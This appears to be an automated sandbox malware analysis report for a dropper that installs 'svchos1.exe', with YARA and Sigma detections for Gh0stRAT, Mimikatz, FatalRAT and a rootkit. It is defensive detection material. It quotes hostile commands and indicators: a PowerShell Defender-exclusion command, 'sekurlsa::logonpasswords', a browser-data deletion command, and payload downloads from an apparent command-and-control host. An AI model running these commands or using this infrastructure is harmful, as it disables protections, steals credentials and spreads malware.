33.2.svchos1.exe.30fd6bc.2.raw.unpack	GhostDragon_Gh0stRAT	Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report	Florian Roth	0x24108:$x4: Http/1.1 403 Forbidden 0x24108:$s5: Http/1.1 403 Forbidden
33.2.svchos1.exe.30fd6bc.2.raw.unpack	Mimikatz_Strings	Detects Mimikatz strings	Florian Roth	0x240bf:$x1: sekurlsa::logonpasswords
33.2.svchos1.exe.30fd6bc.2.raw.unpack	INDICATOR_TOOL_RTK_HiddenRootKit	Detects the Hidden public rootkit	ditekSHen	0x8712:$h1: Hid_State 0x1ac78:$h1: Hid_State 0x8726:$h2: Hid_StealthMode 0x1ac98:$h2: Hid_StealthMode 0x8746:$h3: Hid_HideFsDirs 0x1acb8:$h3: Hid_HideFsDirs 0x8764:$h4: Hid_HideFsFiles 0x1acd8:$h4: Hid_HideFsFiles 0x8784:$h5: Hid_HideRegKeys 0x1acf8:$h5: Hid_HideRegKeys 0x87a4:$h6: Hid_HideRegValues 0x1ad18:$h6: Hid_HideRegValues 0x87c8:$h7: Hid_IgnoredImages 0x1ad48:$h7: Hid_IgnoredImages 0x87ec:$h8: Hid_ProtectedImages 0x1ad78:$h8: Hid_ProtectedImages 0xd02e:$s1: FLTMGR.SYS 0x209a2:$s1: FLTMGR.SYS 0xd5aa:$s2: HAL.dll 0xa14e:$s3: \SystemRoot\System32\csrss.exe 0x1c8f8:$s3: \SystemRoot\System32\csrss.exe
28.2.svchos1.exe.392cd38.6.raw.unpack	JoeSecurity_Mimikatz_1	Yara detected Mimikatz	Joe Security
28.2.svchos1.exe.392cd38.6.raw.unpack	GhostDragon_Gh0stRAT	Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report	Florian Roth	0x24108:$x4: Http/1.1 403 Forbidden 0x24108:$s5: Http/1.1 403 Forbidden
28.2.svchos1.exe.392cd38.6.raw.unpack	Mimikatz_Strings	Detects Mimikatz strings	Florian Roth	0x240bf:$x1: sekurlsa::logonpasswords
28.2.svchos1.exe.392cd38.6.raw.unpack	INDICATOR_TOOL_RTK_HiddenRootKit	Detects the Hidden public rootkit	ditekSHen	0x8712:$h1: Hid_State 0x1ac78:$h1: Hid_State 0x8726:$h2: Hid_StealthMode 0x1ac98:$h2: Hid_StealthMode 0x8746:$h3: Hid_HideFsDirs 0x1acb8:$h3: Hid_HideFsDirs 0x8764:$h4: Hid_HideFsFiles 0x1acd8:$h4: Hid_HideFsFiles 0x8784:$h5: Hid_HideRegKeys 0x1acf8:$h5: Hid_HideRegKeys 0x87a4:$h6: Hid_HideRegValues 0x1ad18:$h6: Hid_HideRegValues 0x87c8:$h7: Hid_IgnoredImages 0x1ad48:$h7: Hid_IgnoredImages 0x87ec:$h8: Hid_ProtectedImages 0x1ad78:$h8: Hid_ProtectedImages 0xd02e:$s1: FLTMGR.SYS 0x209a2:$s1: FLTMGR.SYS 0xd5aa:$s2: HAL.dll 0xa14e:$s3: \SystemRoot\System32\csrss.exe 0x1c8f8:$s3: \SystemRoot\System32\csrss.exe
33.2.svchos1.exe.3000984.3.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
33.2.svchos1.exe.3000984.3.unpack	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
33.2.svchos1.exe.3000984.3.unpack	JoeSecurity_Mimikatz_1	Yara detected Mimikatz	Joe Security
33.2.svchos1.exe.3000984.3.unpack	Mimikatz_Strings	Detects Mimikatz strings	Florian Roth	0x120df7:$x1: sekurlsa::logonpasswords
33.2.svchos1.exe.3000984.3.unpack	INDICATOR_TOOL_RTK_HiddenRootKit	Detects the Hidden public rootkit	ditekSHen	0x10544a:$h1: Hid_State 0x1179b0:$h1: Hid_State 0x10545e:$h2: Hid_StealthMode 0x1179d0:$h2: Hid_StealthMode 0x10547e:$h3: Hid_HideFsDirs 0x1179f0:$h3: Hid_HideFsDirs 0x10549c:$h4: Hid_HideFsFiles 0x117a10:$h4: Hid_HideFsFiles 0x1054bc:$h5: Hid_HideRegKeys 0x117a30:$h5: Hid_HideRegKeys 0x1054dc:$h6: Hid_HideRegValues 0x117a50:$h6: Hid_HideRegValues 0x105500:$h7: Hid_IgnoredImages 0x117a80:$h7: Hid_IgnoredImages 0x105524:$h8: Hid_ProtectedImages 0x117ab0:$h8: Hid_ProtectedImages 0x109d66:$s1: FLTMGR.SYS 0x11d6da:$s1: FLTMGR.SYS 0x10a2e2:$s2: HAL.dll 0x106e86:$s3: \SystemRoot\System32\csrss.exe 0x119630:$s3: \SystemRoot\System32\csrss.exe
33.2.svchos1.exe.3000984.3.unpack	MALWARE_Win_FatalRAT	Detects FatalRAT	ditekSHen	0xfb360:$s1: CHROME_NO_DATA 0xfb350:$s2: CHROME_UNKNOW 0xfc1b4:$s4: InetCpl.cpl,ClearMyTracksByProcess 0xfc254:$s7: del /s /f %appdata%\Mozilla\Firefox 0xfb388:$s9: fnGetChromeUserInfo
28.2.svchos1.exe.36f0984.3.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
28.2.svchos1.exe.36f0984.3.unpack	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
28.2.svchos1.exe.36f0984.3.unpack	JoeSecurity_Mimikatz_1	Yara detected Mimikatz	Joe Security
28.2.svchos1.exe.36f0984.3.unpack	Mimikatz_Strings	Detects Mimikatz strings	Florian Roth	0x120df7:$x1: sekurlsa::logonpasswords
28.2.svchos1.exe.36f0984.3.unpack	INDICATOR_TOOL_RTK_HiddenRootKit	Detects the Hidden public rootkit	ditekSHen	0x10544a:$h1: Hid_State 0x1179b0:$h1: Hid_State 0x10545e:$h2: Hid_StealthMode 0x1179d0:$h2: Hid_StealthMode 0x10547e:$h3: Hid_HideFsDirs 0x1179f0:$h3: Hid_HideFsDirs 0x10549c:$h4: Hid_HideFsFiles 0x117a10:$h4: Hid_HideFsFiles 0x1054bc:$h5: Hid_HideRegKeys 0x117a30:$h5: Hid_HideRegKeys 0x1054dc:$h6: Hid_HideRegValues 0x117a50:$h6: Hid_HideRegValues 0x105500:$h7: Hid_IgnoredImages 0x117a80:$h7: Hid_IgnoredImages 0x105524:$h8: Hid_ProtectedImages 0x117ab0:$h8: Hid_ProtectedImages 0x109d66:$s1: FLTMGR.SYS 0x11d6da:$s1: FLTMGR.SYS 0x10a2e2:$s2: HAL.dll 0x106e86:$s3: \SystemRoot\System32\csrss.exe 0x119630:$s3: \SystemRoot\System32\csrss.exe
28.2.svchos1.exe.36f0984.3.unpack	MALWARE_Win_FatalRAT	Detects FatalRAT	ditekSHen	0xfb360:$s1: CHROME_NO_DATA 0xfb350:$s2: CHROME_UNKNOW 0xfc1b4:$s4: InetCpl.cpl,ClearMyTracksByProcess 0xfc254:$s7: del /s /f %appdata%\Mozilla\Firefox 0xfb388:$s9: fnGetChromeUserInfo
Click to see the 47 entries

Sigma Signatures

System Summary

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Documents\MM\svchos1.exe, CommandLine: C:\Users\Public\Documents\MM\svchos1.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\MM\svchos1.exe, NewProcessName: C:\Users\Public\Documents\MM\svchos1.exe, OriginalFileName: C:\Users\Public\Documents\MM\svchos1.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1048, ProcessCommandLine: C:\Users\Public\Documents\MM\svchos1.exe, ProcessId: 3508, ProcessName: svchos1.exe

Sigma detected: Parent in Public Folder Suspicious Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'", CommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\Public\Documents\MM\svchos1.exe, ParentImage: C:\Users\Public\Documents\MM\svchos1.exe, ParentProcessId: 3508, ParentProcessName: svchos1.exe, ProcessCommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'", ProcessId: 7684, ProcessName: powershell.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'", CommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\[System Process]12.exe", ParentImage: C:\Users\user\Desktop\[System Process]12.exe, ParentProcessId: 5220, ParentProcessName: [System Process]12.exe, ProcessCommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'", ProcessId: 7112, ProcessName: powershell.exe

Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder

Source: File created

Author: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 3064, TargetFilename: C:\Users\Public\Documents\MM

Sigma detected: Communication To Uncommon Destination Ports

Source: Network Connection

Author: Florian Roth (Nextron Systems): Data: DestinationIp: 8.218.113.210, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Users\user\Desktop\[System Process]12.exe, Initiated: true, ProcessId: 7064, Protocol: tcp, SourceIp: 192.168.2.11, SourceIsIpv6: false, SourcePort: 49708

Sigma detected: Powershell Defender Exclusion

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'", CommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\[System Process]12.exe", ParentImage: C:\Users\user\Desktop\[System Process]12.exe, ParentProcessId: 5220, ParentProcessName: [System Process]12.exe, ProcessCommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'", ProcessId: 7112, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'", CommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\[System Process]12.exe", ParentImage: C:\Users\user\Desktop\[System Process]12.exe, ParentProcessId: 5220, ParentProcessName: [System Process]12.exe, ProcessCommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'", ProcessId: 7112, ProcessName: powershell.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: [System Process]12.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\Public\Documents\MM\svchos1.exe

Avira: detection malicious, Label: TR/Dldr.Agent.jzyte

Multi AV Scanner detection for dropped file

Source: C:\Users\Public\Documents\MM\svchos1.exe

ReversingLabs: Detection: 42%

Multi AV Scanner detection for submitted file

Source: [System Process]12.exe	Virustotal: Detection: 52%			Perma Link
Source: [System Process]12.exe	ReversingLabs: Detection: 42%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.4% probability

Source: [System Process]12.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 111.170.25.41:443 -> 192.168.2.11:49698 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 111.170.25.41:443 -> 192.168.2.11:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 111.170.25.41:443 -> 192.168.2.11:49710 version: TLS 1.2

Source: [System Process]12.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\ZZ\Desktop\RpcTsch\Release\RpcTsch.pdb source: [System Process]12.exe, [System Process]12.exe, 00000009.00000003.1568004818.0000000002F70000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: \Release\Dll1.pdb source: svchos1.exe
Source:	Binary string: C:\Users\zz\Desktop\sdfsd\Release\sdfsd.pdb source: [System Process]12.exe, 00000000.00000000.1063449375.000000000086C000.00000002.00000001.01000000.00000003.sdmp, [System Process]12.exe, 00000009.00000000.1277633035.000000000086C000.00000002.00000001.01000000.00000003.sdmp

Source: C:\Users\user\Desktop\[System Process]12.exe	File opened: z:	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File opened: x:	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File opened: v:	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File opened: t:	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File opened: r:	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File opened: p:	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File opened: n:	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File opened: l:	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File opened: j:	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File opened: h:	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File opened: f:	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File opened: b:	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File opened: y:	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File opened: w:	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File opened: u:	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File opened: s:	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File opened: q:	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File opened: o:	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File opened: m:	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File opened: k:	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File opened: i:	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File opened: g:	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File opened: e:	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: c:
Source: C:\Users\user\Desktop\[System Process]12.exe	File opened: [:	Jump to behavior

Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_002A7178 __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,	28_2_002A7178
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_038392B0 lstrlen,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	28_2_038392B0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_0385B250 lstrcat,lstrcat,lstrcat,FindFirstFileA,GetPrivateProfileStringA,lstrlen,strstr,GetPrivateProfileStringA,lstrlen,lstrlen,LocalSize,LocalReAlloc,lstrlen,lstrlen,lstrlen,lstrlen,FindNextFileA,FindClose,	28_2_0385B250
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_03839090 lstrlen,wsprintfA,FindFirstFileA,LocalAlloc,LocalReAlloc,lstrlen,FindNextFileA,LocalFree,FindClose,	28_2_03839090
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_038397D0 lstrlen,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,	28_2_038397D0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_03839B60 FindFirstFileA,FindClose,FindClose,	28_2_03839B60
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_0383BD60 FindFirstFileA,_strcmpi,DeleteFileA,_strcmpi,_strcmpi,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	28_2_0383BD60
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_03839C40 FindFirstFileA,FindClose,CloseHandle,CreateFileA,	28_2_03839C40
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_002A7178 __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,	33_2_002A7178
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_0316B250 lstrcat,lstrcat,lstrcat,FindFirstFileA,GetPrivateProfileStringA,lstrlen,strstr,GetPrivateProfileStringA,lstrlen,lstrlen,LocalSize,LocalReAlloc,lstrlen,lstrlen,lstrlen,lstrlen,FindNextFileA,FindClose,	33_2_0316B250
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_031492B0 lstrlen,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	33_2_031492B0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_03149090 lstrlen,wsprintfA,FindFirstFileA,LocalAlloc,LocalReAlloc,lstrlen,FindNextFileA,LocalFree,FindClose,	33_2_03149090
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_031497D0 lstrlen,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,	33_2_031497D0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_03149B60 FindFirstFileA,FindClose,FindClose,	33_2_03149B60
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_0314BD60 FindFirstFileA,_strcmpi,DeleteFileA,_strcmpi,_strcmpi,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	33_2_0314BD60
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_03149C40 FindFirstFileA,FindClose,CloseHandle,CreateFileA,	33_2_03149C40

Source: C:\Users\Public\Documents\MM\svchos1.exe

Code function: 28_2_03838E60 GetLogicalDriveStringsA,GetUserNameA,_strcmpi,SHGetFolderPathA,CloseHandle,lstrlen,lstrlen,lstrlen,GetVolumeInformationA,SHGetFileInfo,lstrlen,lstrlen,GetDiskFreeSpaceExA,GetDriveTypeA,lstrlen,

28_2_03838E60

Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 4x nop then sub esp, 0000009Ch	28_2_036FF35C
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	28_2_0371F0F4
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 4x nop then push ebp	28_2_0370561D
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 4x nop then push esi	28_2_03708938
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 4x nop then push esi	28_2_0370581E
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	28_2_0385E770
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 4x nop then sub esp, 0000009Ch	33_2_0300F35C
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	33_2_0302F0F4
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 4x nop then push ebp	33_2_0301561D
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 4x nop then push esi	33_2_03018938
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 4x nop then push esi	33_2_0301581E
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	33_2_0316E770

Source: global traffic

TCP traffic: 192.168.2.11:49708 -> 8.218.113.210:8080

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic

HTTP traffic detected: GET /ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1741169086388/3.txt HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: fs-im-kefu.7moor-fs1.comConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.113.210
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.113.210
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.113.210
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.113.210
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.113.210
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.113.210
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.113.210
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.113.210
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.113.210
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.113.210
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.113.210
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.113.210
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.113.210
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.113.210
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.113.210
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.113.210
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.113.210
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.113.210
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.113.210
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.113.210
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.113.210
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.113.210
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.113.210
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.113.210
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.113.210
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.113.210
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.113.210
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.113.210
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.113.210
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.113.210
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.113.210
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.113.210
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.113.210
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.113.210
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.113.210
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.113.210
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.113.210
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.113.210
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.113.210
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.113.210
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.113.210
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.113.210
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.113.210
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.113.210
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.113.210
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.113.210
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.113.210
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.113.210
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.113.210
Source: unknown	TCP traffic detected without corresponding DNS query: 8.218.113.210

Source: C:\Users\Public\Documents\MM\svchos1.exe

Code function: 28_2_00271200 GetFileAttributesW,URLDownloadToFileW,CreateFileW,MessageBoxW,GetFileSize,MessageBoxW,CloseHandle,VirtualAlloc,MessageBoxW,CloseHandle,ReadFile,CloseHandle,VirtualFree,MessageBoxW,VirtualFree,CloseHandle,

28_2_00271200

Source: global traffic	HTTP traffic detected: GET /ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1741169086388/3.txt HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: fs-im-kefu.7moor-fs1.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1728896464326/4.txt HTTP/1.1User-Agent: DownloadAppHost: fs-im-kefu.7moor-fs1.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1741001373486/7.txt HTTP/1.1User-Agent: DownloadAppHost: fs-im-kefu.7moor-fs1.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1728896464326/4.txt HTTP/1.1User-Agent: DownloadAppHost: fs-im-kefu.7moor-fs1.comCache-Control: no-cache

Source: global traffic

DNS traffic detected: DNS query: fs-im-kefu.7moor-fs1.com

Source: [System Process]12.exe, 00000009.00000003.2691262938.0000000001022000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000009.00000003.2178354862.0000000001025000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000009.00000003.2178262792.0000000001022000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateS
Source: [System Process]12.exe, 00000009.00000003.2178354862.0000000001025000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000009.00000003.2178262792.000000000101F000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000009.00000003.2178006793.00000000057CA000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000009.00000003.2178262792.0000000001022000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000009.00000003.2548834267.00000000057C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: powershell.exe, 0000000C.00000002.1332198337.000000000289F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1332342442.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1358415497.000000000753E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1357283977.00000000074BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: powershell.exe, 0000000C.00000002.1366156459.0000000007F68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: [System Process]12.exe, 00000009.00000003.2178354862.0000000001025000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000009.00000003.2695630715.0000000001004000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000009.00000003.2178006793.00000000057CA000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000009.00000003.2178262792.0000000001022000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000009.00000003.2548834267.00000000057C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.trust-provider.cn/TrustAsiaRSAOVTLSCAG3.crl0
Source: [System Process]12.exe, 00000009.00000003.2695630715.0000000001004000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.trust-provider.cn/TrustAsiaRSAOVTLSCAG3
Source: [System Process]12.exe, 00000009.00000003.2178354862.0000000001025000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000009.00000003.2178006793.00000000057CA000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000009.00000003.2178262792.0000000001022000.00000004.00000020.00020000.00000000.sdmp, [System Process]12.exe, 00000009.00000003.2548834267.00000000057C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.trust-provider.cn/TrustAsiaRSAOVTLSCAG3.crt0)
